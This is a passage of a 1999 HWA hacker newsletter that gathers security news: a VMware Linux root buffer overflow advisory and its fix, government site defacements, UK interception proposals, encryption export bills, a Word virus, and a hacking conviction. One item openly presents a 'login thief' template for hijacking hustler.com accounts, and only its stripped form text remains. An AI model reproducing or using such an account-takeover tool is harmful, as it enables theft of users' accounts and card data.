-------------------------------------------------------------------- @HWA 06.0 VMware Security Alert ~~~~~~~~~~~~~~~~~~~~~ Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/ Date: Fri, 25 Jun 1999 19:18:35 -0700 From: Jason R. Rhoads To: BUGTRAQ@netspace.org Subject: VMware Security Alert "On June 22nd, 1999, VMware, Inc. was notified of a security problem with VMware for Linux 1.0.1. This security hole is also present in all previous versions of VMware for Linux. The security hole has been fixed in VMware for Linux 1.0.2 released today. The security hole allows a buffer overrun attack against VMware for Linux to result in unprivileged root access to a machine An updated version of VMware for Linux which fixes this problem is available now, see below. As far as we know, this breach has never been used for malicious purposes, or caused any harm to customer installations. VMware, Inc. apologizes for the inconvenience to our users." http://www.vmware.com/news/security.html ----------------------------------------------------------------------------- VMware Security Alert Date: June 25th, 1999 On June 22nd, 1999, VMware, Inc. was notified of a security problem with VMware for Linux 1.0.1. This security hole is also present in all previous versions of VMware for Linux. The security hole has been fixed in VMware for Linux 1.0.2 released today. The security hole allows a buffer overrun attack against VMware for Linux to result in unprivileged root access to a machine. An updated version of VMware for Linux which fixes this problem is available now, see below. As far as we know, this breach has never been used for malicious purposes, or caused any harm to customer installations. VMware, Inc. apologizes for the inconvenience to our users. Vulnerable Systems The security hole allows an attack to occur during VMware startup, but before a virtual machine is powered on. Guest operating systems themselves are unlikely to be affected by these buffer overflow attacks. Systems most vulnerable to this attack are multi-user Linux systems that have VMware installed. A malicious user with access to an account on the system could exploit the hole. Stand alone single-user machines are not at high risk from this security hole. This hole does not allow direct network based 'worm' style attacks against VMware. This security hole was discovered by Asylum Security, a division of CyberSpace 2000, a professional computer security response team. VMware has taken immediate action in response to this event. VMware for Linux 1.0.2 was made available for download on June 25th, 1999 on our web site and mirror sites. The shipment of CD-ROMs has been suspended and the inventory discarded. Customers who have purchased VMware for have been notified by electronic mail, VMware has also posted security alerts to newsgroups at news.vmware.com. Affected VMware Releases This security hole is present in VMware for Linux 1.0.1 and all previous versions, including the beta versions (build-106, build-135, build-152) and the experimental version (build-179). VMware recommends that users replace beta and experimental versions with VMware for Linux 1.0.2. An updated VMware for Linux experimental release with fixes for this security hole will be made available in the near future. How to Close this Security Hole The security hole can be closed by simply upgrading to VMware for Linux version 1.0.2: 1.Download VMware for Linux 1.0.2 from one of our mirror sites 2.Untar the distribution. tar zxvf vmware-1.0.2.tar.gz 3.Change directory to vmware-install cd vmware-install 4.As root, install VMware for Linux su ./install.pl You will first be asked whether you want to upgrade VMware for Linux. Simply answer yes at this point and then follow any installer instructions. NOTE: It is not possible to resolve this security problem by removing suid (Set User ID) root privileges from the VMware executable. VMware must be suid root to run correctly. Reporting Security Issues VMware is committed to addressing security issues and providing customers with information on how they can protect themselves. If you identify what you believe may be a security issue with a VMware product, please send an email to security@vmware.com. We will work to appropriately address and communicate the issue. Notification of Security Alerts When VMware becomes aware of a security issue that significantly affects our products, we will take action to notify affected customers. Typically this notification will be in the form of a security bulletin explaining the issue, and where possible a response to the problem. These bulletins will both be emailed to affected customers and posted on our web site and newsgroups at news.vmware.com. ----------------------------------------------------------------------------- Date: Sat, 26 Jun 1999 17:33:22 -0400 From: Don To: BUGTRAQ@netspace.org Subject: VMWare Advisory - buffer overflows This advisory was made on 06/21/99 and was to be released on 06/28/99 (or after a fix was released). We would like to recognize the VMware staff and their responsiveness to the bug reports. Last night, customers who purchased their product received notices to upgrade to VMware v1.0.2. For more information on the VMware bugs, visit: http://www.vmware.com/news/security.html http://www.cyberspace2000.com/security/advisories -Don Sausa ----------[asylum security]------------ id: #99021, team director e-mail: don@cyberspace2000.com web: http://cyberspace2000.com/security --------------------------------------- Team Asylum Security Copyright (c) 1999 By CyberSpace 2000 http://www.cyberspace2000.com/security Source: Seth L. [seth@cyberspace2000.com] Advisory Date: 06/21/99 Release Date: 06/28/99 [ Final Revision: 06/25/99 ] Affected -------- VMware v1.0.1 and earlier for Linux. Product Description ------------------- VMware v1.0.1 is a software product by VMware, Inc. that creates a virtual machine in which you can install multiple operating systems without repartitioning or formatting your hard drive. Vulnerability Summary --------------------- Team Asylum has found multiple buffer overflows existing in VMware v1.0.1 for Linux. Earlier versions also have the same buffer overflows. VMware Inc. has been notified of these overflows and they have released VMware v1.0.2 as a fix. Any local user can exploit these overflows to gain root access. Fix --- All users are encouraged to upgrade to VMware v1.0.2. You may download it directly off http://www.vmware.com. Special Thanks -------------- Special thanks to VMware staff for responding quickly to our bug reports. Within 3 days, they have managed to fix the overflows, as well as stop the physical distribution of their v1.0.1 product. All customers who have purchased VMware have been notified as of 06/25/99 12:00 midnight (PST) about the new VMware v1.0.2 version. @HWA 07.0 Security vulnerability in hustler.com login template ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/ security vulnerability in hustler.com which allows any user to steal another users account and gain access to full access to their account including cc# information no fix yet. hustler.com has been informed. ---------------------------------------------------------------------------- exploit template ---------------------------------------------------------------------------- HUSTLER LOGIN THEIF BY EGODEATH
HACKED

Change My Password - ego's M0D1Fi3D verzi0n

Highlight the User ID: This is the hustler account thief script
in order for this to work you must know
somones real login name ( if its an old carded
account with a nick like XTC, give up
you cant steal a froozen account, but
yea.. u can change its password...
Enter Your New Password Enter Password again
@HWA 08.0 DOD investigating computer 'Mob-like' tactics ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: Federal Computer Week;http://www.fcw.com/pubs/fcw/fcwhome.htm JUNE 30, 1999 . . . 12:25 EDT DOD investigating computer 'mob tactics' BY DANIEL VERTON (dan_verton@fcw.com) While a senior adviser to the Defense Department testified before Congress this week on threats to national security stemming from the export of powerful computer technology, his supervisor allegedly attempted to access and tamper with his computer, prompting the immediate launch of a full-scale investigation. Rep. Dan Burton (R-Ind.), chairman of the House Government Reform Committee, said Jay Davis, director of the Defense Threat Reduction Agency, informed the committee on June 28 that an investigation was under way into an incident involving unauthorized access to the computer belonging to a senior strategic trade adviser to the agency. According to Burton, the incident took place while Peter Leitner, a longtime internal critic of DOD's policy on exporting sensitive computer technologies, was testifying on June 24 before the committee regarding security problems stemming from that policy. Although no details from the investigation have been released yet, Burton claims that the incident is an example of DOD officials trying to strong-arm a congressional witness into not cooperating with the committee. "While Dr. Leitner was telling my committee about the retaliation he suffered for bringing his concerns to his superiors and Congress, his supervisor was trying to secretly access his computer," Burton said. "This smacks of mob tactics. Congress will not stand for this kind of witness intimidation." Although DTRA has launched an investigation into the incident, Burton said he plans to call upon Defense Secretary William Cohen to ask for "his personal involvement" in the case. "I intend to ask a lot of questions of the Defense Department officials involved, and I expect to get straight answers," Burton said. Leitner has criticized the department's policy of easing export controls on powerful computer technology that is used to simulate and test the reliability of nuclear weapons, claiming that the acquisition of supercomputer technology abroad was feeding a new form of Cold War characterized by an arms race for "virtual weapons." @HWA 09.0 GSA announces Intrusion Detection Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: Federal Computer Week;http://www.fcw.com/pubs/fcw/fcwhome.htm JUNE 28, 1999 GSA launches intrusion-detection net BY DIANE FRANK (diane_frank@fcw.com) The General Services Administration last week asked industry for information about emerging security technology for detecting unauthorized users on agency networks, with the goal of building a government intrusion-detection system by the end of next year. In building the Federal Intrusion Detection Network (Fidnet), GSA hopes to find security tools vendors are developing that overcome the weaknesses of existing technology. By keeping ahead of the latest technology, GSA hopes to leave agency defenses less vulnerable to hackers, agency officials said. "We want to encourage people to develop new technologies that will help us keep neck and neck with the perpetrator," said David Jarrell, program manager for the GSA portion of Fidnet in the Federal Technology Service's Office of Information Security and technical director of the Federal Computer Incident Response Capability. OIS will look not only to established intrusion-detection vendors but to new companies and people that "we haven't even heard of," Jarrell said. "I think there are people out there that are significantly brilliant enough to solve this and we hope that this [request for information] will cause them to come forward," he said. GSA plans to use the vendor-provided information to develop prototypes by the first quarter of fiscal 2000, said Tom Burke, GSA's assistant commissioner of information security. Down the line, OIS may even pay some of the vendors to put together a long-term, real-world demonstration of their capabilities at an agency, he said. GSA particularly is interested in finding intrusion-detection systems that are more capable of detecting attacks as they happen instead of after the fact. The problem is that most intrusion-detection solutions work the same way anti-virus protection does: They check network-use patterns against a known list of intrusion "signatures" and send out alerts when they come across a match. But as vendors and users have known for years, this method will not catch intrusions that are not on that list. Also, most products just now are advancing to the point where they alert administrators at the time an intrusion takes place. "We find that many of the off-the-shelf products that are available today are really a response to the intrusions, and they are always a step behind the intruder," Jarrell said. "We want to look to the future and some artificial intelligence that will learn as it goes about the attacks that are being launched." This type of capability would be more than welcome to agencies, especially if they are enabled to respond more quickly at the local level, said one senior civilian agency official. Others recognized the potential benefits of sharing attack "experience" across government. "What I would hope this next-generation intrusion detection could bring to us is the capability not only to monitor [intrusions] but to put together the information in a history for reference," said Sarah Jane League, Defense Department liaison at the Critical Infrastructure Assurance Office. "It should bring that pattern recognition and learn as it goes...so that over time it will have the ability to recognize" not only attacks but what could be attacks, she said. Vendors have been working on this type of product, sometimes called anomaly detection, for some time. "ISS has a lot of research efforts in place to advance the intrusion-detection market," said Mark Wood, intrusion-detection product manager at Internet Security Systems Inc., maker of the Real-Secure intrusion-detection product line. "Having a pre-defined list of signatures is nice, but you'd like to detect novel attacks, things you don't know about." One major problem vendors are struggling with in producing this type of solution is the large number of "false positives" -- incorrectly perceived attacks -- that are generated when a network is scanned, Wood said. Despite this, a commercially viable solution could be available within the next year, he said. "It's certainly worthwhile that someone like the GSA is driving this; it's absolutely necessary," Wood said. "Perhaps this will help coordinate the industry so that they will provide something sooner than they would have." The need for this type of solution across government has been underscored by the more than 40 federal World Wide Web sites that have been hacked in the last two months, including at least six last week. And these attacks are only the most noticeable types of intrusions into government networks, according to federal experts testifying before Congress last week [see related story, "House member suggests regular network security reports"]. However, in the end, while many would wish otherwise, keeping up with attackers instead of one step behind really is the best that anyone can do, Jarrell said. "There is no silver bullet; there is no perfect solution when it comes to intrusion detection," he said. "As I've said before, if you build a better mousetrap, a better mouse will evolve." @HWA 10.0 Nasa servers reportedly hacked ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.newsbytes.com/pubNews/132718.html 30 Jun 1999, 10:51 AM CST By David McGuire, Newsbytes. MINNEAPOLIS, MINNESOTA, U.S.A., . In what appears to be the third computer attack on a government Website this week, crackers may have gained unauthorized access to one or more National Aeronautics and Space Administration (NASA) servers yesterday. "There is some indication that a couple servers at the Marshal Space Flight Center in Huntsville, Alabama" were attacked earlier this week, a NASA spokesperson told Newsbytes today. NASA could not confirm the reports as of this writing. The Marshall site was up and running as of 11:00 EDT today. While Sunday's hack of the US Army's home page typifies the kind of high-profile attack favored by many hacker (more accurately known as cracker) groups, the apparent Marshal attack and yesterday's crack of National Oceanic and Atmospheric Administration's (NOAA) Norman, Okla.-based Storm Prediction Center are more puzzling, Newsbytes notes. Marshall is a fairly low-profile NASA center that focuses primarily on research in the areas of astronomy, low gravity, and space shuttle propulsion. The Storm Prediction Center (SPC) provides nationwide weather forecasts. The SPC hack caught NOAA by surprise. "At about three AM, some Internet customer called one of our forecasters and said 'You better check your Website,'" SPC Director Joe Schaefer told Newsbytes yesterday. "We produce weather forecasts for the whole country," he said. "We are doing a public good. There is no way I can see that we are harming anybody. To come after a site like this is strange, to put it mildly." The Army hack was somewhat more typical. At some point Sunday night, crackers replaced the Army's home page with a page that read "Hello, this Website hack has a purpose. The purpose is to settle rumors. Global Hell is alive, Global Hell will not die," Lt. Col. Ron Burns of the Army's Director for Information Systems Command, Control, Communications and Computers (DISC4) unit told Newsbytes Monday. Sunday's attack was the first successful crack of the Army's main site, located at http://www4.army.mil . The US Senate and Federal Bureau of Investigation (FBI) have also suffered recent Website attacks. The FBI declined comment on the string of hacker attacks. Reported by Newsbytes.com, http://www.newsbytes.com . 10:51 CST Reposted 10:59 CST @HWA 11.0 UK May Force ISPs to Install Taps ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 28th From HNN http://www.hackernews.com/ contributed by Weld Pond The British Interception of Communications Act has been the target of proposed changes recently. The changes would require all communications service providers to build in, at their expense, capabilities for government agents to be able to listen in to communications. This proposal is particularly broad as it does not stop at the internet and covers everything from pagers to video conferencing to VPNs. Theses new requirements have been proposed by the International Law Enforcement Telecommunications Seminar (ILETS)an exclusive FBI funded group that meets in secret. Tech Web http://www.techweb.com/news/story/TWB19990625S0019 U.K. Wants ISPs To Build In Interception (06/25/99, 3:40 p.m. ET) By Duncan Campbell, TechWeb The British government has become the first in Europe to openly propose internationally agreed requirements for ISPs to build technology into networks that would allow for police surveillance. Under proposals for changes to the Interception of Communications Act announced by the Home Office this week, all communications service providers (CSPs) would be required to build interception software or hardware into their systems. The law -- if passed -- will apply to all types of new communications services, including Internet telephony, TV conferencing, paging, and satellite based personal communications systems. The International User Requirements have been drawn up over the past six years by a group founded by the U.S. FBI, called the International Law Enforcement Telecommunications Seminar (ILETS), which meets in secret. The group excludes representatives from industry or civil rights organizations, and has attempted to standardize its objectives as an International Telecommunication Union requirement. According to this week's "white paper," every type of network will be covered, including VPNsoperated through the Internet or other TCP/IP systems. The new law will also cover interception of business telecom services, ranging from basic networks of a few lines found within a small office to large networks linking offices, in both the public and private sectors, the document says. Under the present British Interception of Communications Act, only licensed public telecom operators have to provide government tapping facilities within their networks. However, ISPs must surrender any stored communications data they have, including e-mail, Web-access records, and service details, if served with an order. Home Secretary Jack Straw now proposes all CSPs be required to take reasonable steps to ensure their system is capable of being intercepted. "This will be an ongoing requirement CSPs will have to consider each time they develop their network or introduce new services," Straw said. "CSPs will also be required to provide reasonable assistance to effect warranted intercepts." This will include real-time access to data about their subscribers and information about services they have used, including logs of telephone calls, e-mail, or website accesses. A key part of technical arrangements to be made will ensure operators will not be able to know what information has been copied from their systems. The British government said the new law would make full provision for human-rights legislation, Straw said. But according to Madeleine Colvin of Justice, the international human-rights organization and British section of the International Commission of Jurists, the proposed law would not achieve this. "There are major gaps in what these proposals suggest for controlling surveillance methods. For example, how is anyone to know if their human rights may have been abused if they are never going to be told that their e-mail has been intercepted by the government?" he asked. @HWA 12.0 Crypto Tie Downs Loosened ~~~~~~~~~~~~~~~~~~~~~~~~~ June 28th From HNN http://www.hackernews.com/ contributed by mortel Bills to loosen the restrictions on exporting strong encryption were approved on Thursday by the U.S. Senate and House Commerce Committees. The House Security and Freedom through Encryption (SAFE) Act removes the government restrictions on export of strong encryption if a comparable encryption product is commercially available outside the U.S. In addition, the SAFE Act bars the government from requiring key recovery. Yeah! CNN http://www.cnn.com/TECH/computing/9906/25/cryptbill.idg/ U.S. committees approve encryption bill by Elinor Mills Abreu From... (IDG) -- The U.S. Senate and House Commerce Committees Thursday approved bills that would liberalize encryption export regulations. In addition, the Senate committee passed bills calling for the promotion of digital signatures and filtering software to block pornography. The House Security and Freedom through Encryption (SAFE) Act removes the government restrictions on export of strong encryption if a comparable encryption product is commercially available outside the U.S. In addition, the SAFE Act bars the government from requiring key recovery, whereby the government would have access to keys to decode encrypted messages for law-enforcement purposes. The government argues that it needs to control the export of strong encryption for national security. Vendors argue that the restrictions hamper their competitiveness on the worldwide market because strong encryption is readily available outside the U.S. The government wants vendors to develop encryption software that includes a key recovery mechanism. The amendments approved by the House committee would do several things: require that a comparable encryption product be available in a country outside the U.S. in order for a U.S. company to export similar technology there; bar export to the People's Liberation Army or the Communist Military in China; allow the Secretary of Commerce to deny the export of encryption products if they would be used to harm national security, to sexually exploit children or to execute other illegal activities; require the Secretary of Commerce to consult with the secretaries of State and Defense, the Director of Central Intelligence and the Attorney General when reviewing a product; and subject a person to criminal penalties for not providing access to encrypted data if a subpoena were served and the person had the capability to decrypt the data. Meanwhile, Sen. John McCain [R-Ariz.] proposed a Senate encryption bill that would allow for the exportation of encryption of key lengths up to 64 bits. In general, companies currently must get a license to export encryption higher than 56 bits in key length. In addition, the McCain encryption bill would allow for the export of stronger "nondefense" encryption to "responsible entities" and governments in the North Atlantic Treaty Organization, the Association of Southeast Asian Nations and the Organization for Economic Cooperation and Development. However, the Secretary of Commerce would be allowed to prohibit export of particular encryption products to an individual or organization in a foreign country. An Encryption Export Advisory Board would be created to review applications for exemption of encryption of over 64 bits, make recommendations to the Secretary of Commerce and authorize more funding to law enforcement and national security agencies to "upgrade facilities and intelligence." The bill would ask the National Institute of Standards and Technology to establish an advanced encryption standard by Jan. 1, 2002. "The bill carefully balances our national security and law enforcement interests while updating current laws on encryption technology," McCain said in a statement. "It is illogical to deny U.S. producers the ability to compete globally if similar products are already being offered by foreign companies." On the digital signature front, Sen. Spencer Abraham [R-Mich.] said the Millennium Digital Commerce Act he sponsored would "ensure that individuals and organizations in different states are held to their agreements and obligations even if their respective states have different rules concerning electronically signed documents." The Abraham bill would pre-empt state law from denying that digital contracts are legal solely because they are in electronic form; establish guidelines for international use of electronic signatures that would remove obstacles to electronic transactions; and allow the market to determine the type of authentication technology used in international commerce. The Senate Commerce Committee also grappled with Internet censorship by approving another McCain-sponsored bill. The plan would require schools and libraries receiving government universal service discounts for Internet access to use filtering technology on computers children access that would screen out pornography. Taking up a less controversial bill, the Senate committee also approved a measure to tie cellular phone users calling 911 to medical centers, police and firefighters for faster response time to accidents and emergencies. The bill would expand the coverage areas of wireless telephone service; establish parity of protection for the provision or use of wireless 911 service; and upgrade 911 systems so they can provide information such as location and automatic crash notification data. Alan Davidson, staff counsel for the Washington, D.C.-based Center for Democracy and Technology, said "it was a mixed day for the Internet on Capital Hill." While legislators realize the potential of electronic commerce and favor liberalizing encryption export to advance it, they are fearful of what they see as the "dark side" of the Internet - content that might be objectionable, according to Davidson. Rather than require filtering software in schools and libraries, legislators should offer educational institutions the flexibility to choose "acceptable use or monitoring policies," he said. "Mandating that every school and library filter access to the Internet is not going to be the best way to protect kids," he said. "In addition to the fact that the bill has constitutional problems, it mandates one technological approach without regard to the more effective ways that local communities are already protecting kids." Other committees may review these bills before they go to the floor of the two houses for a vote, he said. @HWA 13.0 Heathen.A Spreads Through Word Files ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 28th From HNN http://www.hackernews.com/ contributed by nvirb While not intentionally malicious or as fast spread as Melissa or WormExplorer Heathen.A is latest threat to computer users. Heathen.A is considered to be a multipartite virus and only infects only Word97 files. PC World http://www.pcworld.com/pcwtoday/article/0,1510,11586,00.html Heathen.A Is at the Gates Keep a lookout: There's a new bug in town. by Matthew Nelson, InfoWorld Electric June 25, 1999, 4:50 p.m. PT SAN MATEO, CALIFORNIA -- Network Associates' Anti-Virus Emergency Response Team is warning users about what it terms a "medium risk" virus called Heathen.A. Heathen.A is a multipartite virus, as it uses two classes of files, an .exe portion and a .doc portion, for its infection. The virus was originally spread from a newsgroup and replicates itself across Microsoft Word 97 files, but it does not destroy data. "It's delivered if someone receives an e-mail with an infected Word 97 document, or if they access any server file that is infected," says Allison Taylor, product marketing manager for corporate antivirus solutions at Network Associates. "It doesn't carry a particular payload except for dropping a patch into your [Windows] 95/98 shell." "It runs a modified version of your Windows Explorer system and then infects the Word 97 documents," Taylor explains. "So once you've been infected, any Word 97 file that you open from then on will also be infected." The macro drops three system files, heathen.vex, heathen.vdl, and heathen.vdo, into a system's C:/Windows subdirectory. When the system is rebooted, the heathen.vex file is renamed explorer.exe, according to AVERT Labs. NAI has assigned the Heathen.A virus a medium-risk level as it is not engineered to appear to be coming from a known user, and because it infects new systems only if a user opens an infected Word 97 file. Heathen.A does not send itself through e-mail as Melissa and Worm.ExploreZip do. NAI has issued a virus update to protect against the Heathen.A virus at AVERT Labs' Web site. @HWA 14.0 $950 for a Log File Analysis Tool ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 28th From HNN http://www.hackernews.com/ contributed by Weld Pond Sandstorm Enterprises has introduced what they are calling a TCP/IP Session Reassembler named TCP.demux. According to the press release it doesn't seem to be more than a glorified grep script. Maybe it is actually useful but $950 seems a little steep. Excite News http://news.excite.com/news/bw/990623/ma-sandstorm Sandstorm Enterprises http://www.sandstorm.net Sandstorm Enterprises Introduces TCP.demux, a TCP/IP Session Reassembler; New, Efficient Tool for Network-Based Investigations, Auditing, and Reverse Engineering Click on our sponsors! Updated 1:34 PM ET June 23, 1999 BOSTON (BUSINESS WIRE) - Sandstorm Enterprises Inc., an information security tools company, has released the first version of TCP.demux, a TCP/IP session reconstruction utility. TCP.demux is the first of a set of tools from Sandstorm Enterprises for advanced network monitoring and surveillance. TCP.demux is designed to make network monitors, such as "tcpdump", "snoop", and "Sniffer Basic" more useful. There are so many connections over even a medium-sized network that it is often impossible for even a high-end commercial network analyzer to present the traffic in a clear, informative way. TCP.demux takes IP streams captured by network monitors, reassembles them into their constituent TCP/IP and UDP sessions, and displays the information in a variety of convenient formats. TCP.demux includes sophisticated and powerful analysis tools for quick identification of relevant sessions. Possible uses of TCP.demux include network security, reverse engineering, and network-based software development. It can be used to create profiles of suspicious users and to find information being sent unencrypted over a network. It can also help point out weaknesses and vulnerabilities in network applications and design. TCP.demux detects and flags anomalies that may be designed to interfere with network monitoring. TCP.demux generates reports in 19 different text or HTML formats. It runs on a wide variety of platforms, including Windows 95/98/2000/NT and many varieties of UNIX, including RedHat Linux 5.1, NetBSD, OpenBSD, FreeBSD, BSDI, and Solaris. TCP.demux can easily be included in batch files, shell scripts, and other applications in any computer language. The idea of a TCP session reconstruction tool is not new, but all other such tools have been platform-specific and embedded in ponderous application suites. "There have been many tools for winnowing through Internet traffic flows, but almost everything to date has been scaled or developed for the workgroup environment," says James VanBokkelen, Sandstorm's President and founder. "The Internet has grown enormously in the past few years, and with it the scale of the problems. TCP.demux is the first tool we know of designed with the scope of today's problems in mind." Analyzing network traffic with TCP.demux is time-efficient, and therefore cost-efficient. Because dumpfile analysis is separated from the capture process, TCP.demux allows remote monitoring of networks. An engineer at one of Sandstorm's beta sites said, after TCP.demux had allowed him to isolate problems on a large congested network in under half an hour, "TCP.demux was the quickest way to debug the system. Had the debugging process been long, it would have jeopardized our ability to ship on time." TCP.demux is being offered at the introductory price of $950. Additional information on TCP.demux can be found at http://www.sandstorm.net/tcpdemux. Sandstorm Enterprises, headquartered in Boston, MA, has been acclaimed for its groundbreaking PhoneSweep telephone scanner, the first commercial product designed to audit corporate telephone networks for vulnerability to attacks by hackers. See Sandstorm Enterprises at the USENIX Security Conference in Washington, D.C. August 25-26. Sandstorm personnel collectively have decades of experience in security management, software development, research, education, and consulting. Sandstorm is committed to providing trusted, reliable products and excellent technical support. Sandstorm Enterprises is on the web at http://www.sandstorm.net. PhoneSweep and TCP.demux are trademarks of Sandstorm Enterprises, Inc. Contact: Sandstorm Enterprises, Inc. James Van Bokkelen (617) 426-5056 jbvb@sandstorm.net or In Washington, DC: Ross Stapleton-Gray rsgray@sandstorm.net or sales@sandstorm.net @HWA 15.0 Youth Charged With $20,000 in Damages ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 28th From HNN http://www.hackernews.com/ contributed by Richard223 The case of a minor from Chesterfield County Mass, made it into a newspaper in Virginia. The youth has been charged with breaking into ACIS/BICNet, according to court documents he caused "the entire system to crash" which resulted in over $20,000 in damage. Evidently the Virginia High Technology Crimes Unit was the investigating office since the suspect used one Virginia system to route his traffic. Richmond Times Dispatch http://gatewayva.com/rtd/dailynews/virginiaarch/hack25.shtml Chesterfield youth pleads guilty to hacking Friday, June 25, 1999 BY MARK BOWES Times-Dispatch Staff Writer A Chesterfield County youth who authorities said is intelligent but committed a foolish act has pleaded guilty to hacking into a Massachusetts Internet provider's system, disabling it and causing at least $20,000 in damage. The 16-year-old, whose identity is being withheld because of his age, pleaded guilty to computer trespassing Monday in Chesterfield Juvenile and Domestic Relations District Court. The judge continued the matter until Aug. 12 so he can decide whether to convict the boy of a felony, as charged, or reduce it to a misdemeanor. Through his attorney, the boy agreed the evidence was sufficient to convict him, "but contested whether or not it was maliciously done," which is required for a felony conviction, said Assistant Chesterfield Commonwealth's Attorney Aubrey M. Davis Jr. "I didn't see it as [a malicious] act," Davis said. "I think it was a foolish act by an intelligent kid who didn't really realize the significance of what he was doing. He's a pretty daggone smart kid." Virginia State Police Special Agent Sal Girgente, who investigated the case here, gave a summary of evidence in court on Monday. According to evidence, the boy, using his mother's Internet account, hacked into the computer network of ACIS/BICNet, an Internet service provider in Ayer, Mass., in August. State police also believe he succeeded in breaking into the computer systems of New Mexico State University and Aurora Communications Exchange Ltd., in Ontario, Canada. Investigators believe he may have hacked into the latter two systems to "cover his tracks" before breaking into the Internet provider's network. The state police's new High Technology Crimes Unit began investigating the case after getting a referral from the FBI's Boston field office. An agent there succeeded in tracking an intruder into the ACIS/ BICNet system back through a Virginia Internet provider to the boy's home in Chester. During an intrusion on Aug. 8, police believe the teen and possibly accomplices replaced system files, among other things, created a new account and turned off system logging, according to court documents. That caused the company's e-mail system to be out of service for 12 hours. Several days later, the intruder again broke into the system and succeeded in causing "the entire system to crash," court papers say. The resulting damage, police said, topped $20,000. The teen "succeeded in bringing the system to its knees," Girgente said. Three FBI traces were successful in leading authorities to the Chesterfield family's Internet account. Police believe the boy and other hackers broke into the system to play games or create chat rooms. © 1999, Richmond Newspapers Inc. @HWA 16.0 Army Fights Online Battle And Looses ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 29th From HNN http://www.hackernews.com/ contributed by Space Rogue Early Monday morning one of the the four web servers for the US Army came under attack. The web page poked at the FBI and their recent raids of the members of the group gH. www4.army.mil was quickly noticed as being defaced and was restored by 6am. It is believed that the attackers used a highly publicized exploit for Cold Fusion, an exploit for which a patch has been available for weeks.(Hmmmmm, maybe I should reenlist and help them out?) HNN Cracked Pages Archive - Be sure to read the html comments. http://www.hackernews.com/archive/crackarch.html CNN http://www.cnn.com/TECH/computing/9906/28/AM-ArmyHacked.ap/ San Jose Mecury News http://www.sjmercury.com/svtech/news/breaking/ap/docs/590787l.htm APB Online http://www.apbonline.com/911/1999/06/28/hack0628_01.html MSNBC http://www.msnbc.com/news/284765.asp Nando Times http://www.techserver.com/story/body/0,1634,65142-103297-733898-0,00.html ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2285307,00.html CNN; Hackers attack Army's main Internet site June 28, 1999 Web posted at: 7:37 PM EDT (2337 GMT) WASHINGTON (AP) -- Computer hackers defaced the Army's main Web site in the latest digital attack on a federal system. Pentagon workers noticed it early Monday and repaired it. Army spokesman Jim Stueve said administrators believe hackers altered the www.army.mil site between 8 p.m. Sunday and 5 a.m. Monday, but no internal systems were affected. "There were no security breaches," he said. The altered site announced the attack "has a purpose ... to settle rumors" about the demise of the loosely organized hacker group that claimed responsibility for the May attack on the White House Web site. Another message hidden within the altered page's computer code urged people who saw it to "trust very few people." Stueve said he noticed the defaced page when he arrived for work Monday morning. It was replaced by 6 a.m. "I just looked at it and just went on to my favorites (other sites) and blew it off because I knew they were going to get to it right away," he said. The attack comes in the wake of several others on prominent government Internet sites, including those of the White House, FBI and Senate. Military pages have long been favorites of hackers. "They're always the target," said Keith Rhodes, a director in the information management division in the General Accounting Office, the investigative branch of Congress. "It's almost like a rite of passage. You have to bust a (military) site to have any credibility." Just last week, experts told the House Science Committee's technology panel that managers at many federal agencies fail to consider computer security adequately and have too few employees with sufficient training. Rhodes, who was among those testifying last week, said Monday that the Defense Department's computer-security expertise is uneven. "They're the best and the worst in computer security," Rhodes said. "They've got some real pros, some of the best in the business. But the DOD is huge ... and some of the areas in the Department of Defense don't have very good security." Outside security experts said they believed the Army site's attackers used a relatively well publicized security loophole in the popular Cold Fusion software package. The Army said only that the incident was under investigation. "The community of attackers is getting better at what they do, and a lot of their tools are getting automated," Rhodes said. "And a lot of the software being sent out is getting worse -- designed for flash with security as an afterthought. You put up your Web site, and its gets creamed." @HWA 17.0 Welfare Reform Law Invades Privacy of US Citizens ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 29th From HNN http://www.hackernews.com/ contributed by Weld Pond The Personal Responsibility and Work Opportunity Reconciliation Act of 1996 was primarily passed to reform the welfare system in the United States. One of the little known provisions of this law is that employers must report all new hires and salary changes to the government on a quarterly basis, this information eventually makes its way to the Administration for Children and Families. Starting next month the program will require banks to search for accounts on people determined to be delinquent on their child-support payments. (Ed Note: This is an eye opening article and is recommended. It is long and the good stuff is at the bottom.) The Charlotte Observer http://www.charlotte.com/click/wiretech/pub/009020.htm Posted at 7:45 p.m. EDT Saturday, June 26, 1999 Huge new electronic `dragnet' assailed by privacy advocates By ROBERT O'HARROW JR. The Washington Post WASHINGTON -- As part of a new and aggressive effort to track down parents who owe child support, the federal government has created a vast computerized data-monitoring system that includes all individuals with new jobs and the names, addresses, Social Security numbers and wages of nearly every working adult in the United States. Government agencies have long gathered personal information for specific reasons, such as collecting taxes. But never before have federal officials had the legal authority and technological ability to locate so many Americans found to be delinquent parents -- or such potential to keep tabs on Americans accused of nothing. The system was established under a little-known part of the law overhauling welfare three years ago. It calls for all employers to quickly file reports on every person they hire and, quarterly, the wages of every worker. States regularly must report all people seeking unemployment benefits and all child-support cases. Starting next month, the system will reach further. Large banks and other financial institutions will be obligated to search for data about delinquent parents by name on behalf of the government, providing authorities with details about bank accounts, money-market mutual funds and other holdings of those parents. State officials, meanwhile, have sharply expanded the use of Social Security numbers. Congress ordered the officials to obtain the nine-digit numbers when issuing licenses -- such as drivers', doctors' and outdoorsmen's -- in order to revoke the licenses of delinquents. Enforcement officials say the coupling of computer technology with details about individuals' employment and financial holdings will give them an unparalleled ability to identify and locate parents who owe child support and, when necessary, withhold money from their paychecks or freeze their financial assets. ``They never get away from us anymore. It's just wonderful. . . . What you're trying to do in child support is build a box, four walls, around a person,'' said Brian Shea, the acting executive director of child-support enforcement in 